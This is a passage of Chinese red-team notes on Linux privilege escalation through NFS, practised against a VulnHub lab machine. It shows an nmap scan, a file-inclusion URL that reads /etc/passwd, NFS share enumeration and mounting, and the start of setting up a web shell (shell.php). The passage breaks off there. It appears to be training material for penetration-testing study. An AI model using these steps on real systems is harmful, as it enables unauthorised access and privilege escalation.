红队内网攻防渗透
1. 内网权限提升技术
1.1 Linux系统提权-Web&用户-NFS安全
NFS是一种基于TCP/IP 传输的网络文件系统协议,通过使用NFS协议,客户机可以像访问本地目录一样访问远程服务器中的共享资源。
https://www.virtualbox.org/wiki/Downloads
https://www.vulnhub.com/entry/hacksudo-2-hackdudo,667/
提升条件:NFS服务开启和web或用户权限进行利用
1.1.1 信息收集:
nmap 192.168.1.6
http://192.168.1.6/file.php?file=/etc/passwd
1.1.2 NFS服务利用
showmount -e 192.168.1.6
mkdir nfs
mount -t nfs 192.168.1.6:/mnt/nfs ./nfs
chmod 777 shell.php<